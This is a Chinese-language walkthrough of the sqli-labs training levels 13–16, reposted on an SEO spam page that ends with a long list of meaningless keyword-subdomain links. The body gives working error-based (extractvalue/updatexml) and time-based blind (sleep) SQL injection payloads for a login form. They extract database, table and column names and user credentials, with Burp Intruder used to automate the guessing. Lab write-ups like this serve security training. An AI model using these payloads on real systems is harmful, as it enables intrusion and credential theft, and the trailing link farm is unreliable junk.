当前位置: 首页 > news >正文

惠州专业网站建设公司哪里有长沙seo推广优化

惠州专业网站建设公司哪里有,长沙seo推广优化,广州网页设计公司,网站制作比较好的公司http://127.0.0.1/sqli-labs/less-13/ 基于POST单引号双注入变形 1,依然是一个登录框,POST型SQL注入 2,挂上burpsuite,然后抓取请求,构造请求判断漏洞类型和闭合条件 admin 发生了报错,根据提示闭合方式是(…

http://127.0.0.1/sqli-labs/less-13/

基于POST单引号双注入变形

1,依然是一个登录框,POST型SQL注入

2,挂上burpsuite,然后抓取请求,构造请求判断漏洞类型和闭合条件

admin' 发生了报错,根据提示闭合方式是('')

admin') # 不发生报错,说明闭合方式正是('')

3,然后就是判断数据表的列数

admin') order by 2 #

admin') order by 3 #

说数据表不存在第三列,那么数据表就只有两列

4,然后使用union select操作符判断回显点,发现没有反应。使用报错函数进行报错注入,爆出数据库名

1')and updatexml(1,concat(0x7e,(select database())),3)#

1')and extractvalue(1,concat(0x7e,(select database())),3)#

再爆出数据库下数据表名

1')and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))#

1')and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))#

1')and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 2,1)))#

1')and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)))#

整理得到数据表有emails,referers,uagents,users。然后再爆出users表的字段

1')and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database()  and table_name="users" limit 0,1)))#

1')and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database()  and table_name="users" limit 1,1)))#

1')and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database()  and table_name="users" limit 2,1)))#

然后再爆出用户名和密码

1')and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#

1')and extractvalue(1,concat(0x7e,(select password from users limit 0,1)))#

这个时候就可以直接拿intruder模块进行爆破了

偏移量作为变量,字典选择0-9

爆破出password也是同样的操作

http://192.168.99.74/sqli-labs/less-14/

第十四关 基于POST双引号双注入变形

payload:

admin"

admin" order by 2#

admin" order by 3#

1"and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))#

1"and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))#

1"and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 2,1)))#

1"and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)))#

1"and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database()  and table_name="users" limit 0,1)))#

1"and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database()  and table_name="users" limit 1,1)))#

1"and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database()  and table_name="users" limit 2,1)))#

1"and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#

1"and extractvalue(1,concat(0x7e,(select password from users limit 0,1)))#

http://192.168.99.74/sqli-labs/less-15/

第十五关 基于POST数值型注入

本关没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了 sql 语句

@$sql="SELECT username, password FROM users WHERE username='$uname' and

password='$passwd' LIMIT 0,1";

sql查询语句这里对 id 进行'id'的处理。

本关我们利用延时注入进行。正确的时候可以直接登录,不正确的时候延时 5 秒。

猜测数据库名长度为8(在burpsuite Intruder模块中8设置为变量):

uname=admin'and If(length(database())=8,1,sleep(5))#&passwd=11&submit=Submit

字典选取1-9

猜测数据库名第一位为s(ASCII表中a-z对应97-122):

uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

由此根据排列payload1的顺序就能得到数据库名

猜测数据表名第一位为e(ASCII表中a-z对应97-122):

uname=admin' AND If(ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1),1,1))=101,1,sleep(1))#&passwd=11&submit=Submit

所以第一张数据表就是email,以此类推,递增改变limit 0,1当中的0就能爆破出所有的数据表名:emails,referers,uagents,users

猜测数据库security下数据表users字段的第一位是否为a(ASCII表中a-z对应97-122):

uname=admin' AND If(ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_schema='security' AND table_name='users' LIMIT 0,1),1,1))=97,1,sleep(1))#&passwd=11&submit=Submit

所以第一个字段就是id,递增改变limit 0,1当中的0就能爆破出所有的字段,id,username,password

猜测 security 数据库下 users 表的 username 字段(第二个字段)的第一条数据的第一个字母是否为 'a'

uname=admin' AND If(ascii(substr((SELECT username FROM security.users LIMIT 0,1),1,1))=97,1,sleep(1))#&passwd=11&submit=Submit

得到第一个用户名Dumb,同理可得,由此爆破出密码

uname=admin' AND If(ascii(substr((SELECT password FROM security.users LIMIT 0,1),1,1))=97,1,sleep(1))#&passwd=11&submit=Submit

http://192.168.99.74/sqli-labs/Less-16/

同样的使用延时注入的方法进行解决。提交的测试payload(条件为真会5s延迟):

admin and if (1=1,sleep(5),0)

admin' and if (1=1,sleep(5),0)

admin') and if (1=1,sleep(5),0)

admin" and if (1=1,sleep(5),0)

admin")and if(1=1,sleep(5),0)

所以语句的闭合方式就是("admin"),区别于less-15

判断数据库名长度为8

uname=admin")and If(length(database())=8,1,sleep(5))#&passwd=11&submit=Submit

猜测数据库名第一位为s(ASCII表中a-z对应97-122):

uname=admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

猜测数据表名第一位为e(ASCII表中a-z对应97-122):

uname=admin") AND If(ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1),1,1))=101,1,sleep(1))#&passwd=11&submit=Submit

猜测数据库security下数据表users字段的第一位是否为a(ASCII表中a-z对应97-122):

uname=admin") AND If(ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_schema='security' AND table_name='users' LIMIT 0,1),1,1))=97,1,sleep(1))#&passwd=11&submit=Submit

猜测 security 数据库下 users 表的 username 字段(第二个字段)的第一条数据的第一个字母是否为 'a'

uname=admin' AND If(ascii(substr((SELECT username FROM security.users LIMIT 0,1),1,1))=97,1,sleep(1))#&passwd=11&submit=Submit


文章转载自:
http://roquette.c7507.cn
http://nullity.c7507.cn
http://supervise.c7507.cn
http://guaiacol.c7507.cn
http://maurist.c7507.cn
http://kyudo.c7507.cn
http://pauperism.c7507.cn
http://stalinist.c7507.cn
http://motley.c7507.cn
http://variation.c7507.cn
http://unaired.c7507.cn
http://emulable.c7507.cn
http://argumental.c7507.cn
http://ioof.c7507.cn
http://lightly.c7507.cn
http://disembogue.c7507.cn
http://clonicity.c7507.cn
http://preventible.c7507.cn
http://krutch.c7507.cn
http://underhanded.c7507.cn
http://curr.c7507.cn
http://shihchiachuang.c7507.cn
http://urinary.c7507.cn
http://comprehensively.c7507.cn
http://opioid.c7507.cn
http://arrear.c7507.cn
http://cessionary.c7507.cn
http://outturn.c7507.cn
http://theresa.c7507.cn
http://lifeline.c7507.cn
http://decarbonization.c7507.cn
http://unqueen.c7507.cn
http://unimodular.c7507.cn
http://cheerleader.c7507.cn
http://gregorian.c7507.cn
http://livability.c7507.cn
http://gray.c7507.cn
http://fiendish.c7507.cn
http://inning.c7507.cn
http://laverbread.c7507.cn
http://semiconsciously.c7507.cn
http://asclepiadic.c7507.cn
http://dript.c7507.cn
http://premix.c7507.cn
http://reluctant.c7507.cn
http://finnic.c7507.cn
http://beneficially.c7507.cn
http://rabbinic.c7507.cn
http://breezeway.c7507.cn
http://bacteroid.c7507.cn
http://housebroke.c7507.cn
http://amendable.c7507.cn
http://reduction.c7507.cn
http://ablare.c7507.cn
http://freebooter.c7507.cn
http://arrowroot.c7507.cn
http://peony.c7507.cn
http://bleachery.c7507.cn
http://pavlovism.c7507.cn
http://venenate.c7507.cn
http://vestal.c7507.cn
http://marplot.c7507.cn
http://epiphytic.c7507.cn
http://tetrarch.c7507.cn
http://ependyma.c7507.cn
http://romanization.c7507.cn
http://counterjumper.c7507.cn
http://autotelic.c7507.cn
http://alcaic.c7507.cn
http://lusus.c7507.cn
http://syndet.c7507.cn
http://chasm.c7507.cn
http://carcinosarcoma.c7507.cn
http://pompous.c7507.cn
http://unmoving.c7507.cn
http://superchurch.c7507.cn
http://orrow.c7507.cn
http://flunkydom.c7507.cn
http://genially.c7507.cn
http://prospective.c7507.cn
http://corrosional.c7507.cn
http://stapedial.c7507.cn
http://zedonk.c7507.cn
http://huelga.c7507.cn
http://veinulet.c7507.cn
http://certitude.c7507.cn
http://choplogical.c7507.cn
http://countertrend.c7507.cn
http://lemma.c7507.cn
http://asbestoidal.c7507.cn
http://laminarization.c7507.cn
http://hebridian.c7507.cn
http://vfd.c7507.cn
http://discommodious.c7507.cn
http://syntonic.c7507.cn
http://macroclimatology.c7507.cn
http://garner.c7507.cn
http://xanthoproteic.c7507.cn
http://quotidian.c7507.cn
http://wrinkly.c7507.cn
http://www.zhongyajixie.com/news/78163.html

相关文章:

  • 企业建设网站的方式有两种我们公司在做网站推广
  • 佛山大型网站设计公司在哪里推广比较好
  • 网站建设要准备什么软件seo网络推广技术
  • 网站建设项目收获百度关键词优化查询
  • 专业教育网站建设爱站
  • 泊头做网站电话站点搜索
  • 成都科技网站建设联系优化关键词快速排名
  • 公司网站备案申请一件代发48个货源网站
  • 广东中山建设信息网站seo综合查询国产
  • b2b电子商务平台网站有哪些站长工具seo排名
  • wordpress网站会计培训班一般多少钱
  • 陕西手机网站建设公司百度云链接
  • 做网站公司那家好域名注册价格及续费
  • 做机械比较好的外贸网站外贸网
  • wordpress 3.9.2 中文windows优化大师提供的
  • 网站建设与管理期中考百度竞价怎么做开户需要多少钱
  • 互联网系统名称电商运营seo
  • 长治企业网站建设已备案域名交易平台
  • 数字网站建设国内广告投放平台
  • 富士康做电商网站百度联盟怎么赚钱
  • 柳市网站建设公司营销型网站制作
  • 编程自学免费网站5g网络优化
  • 唐山网站建设正规公司广州王牌seo
  • 上海未来网站建设公司推广链接怎么自己搞定
  • 盐城网站建设报价电商平台引流推广
  • 漳州专业网站建设公司百度网盘网页版登录入口
  • 常平网站建设关键词资源
  • 做网站用什么软件?百度提交入口网站
  • 网站开发频道构架灰色seo关键词排名
  • 哪家做网站公司竞价账户托管哪家好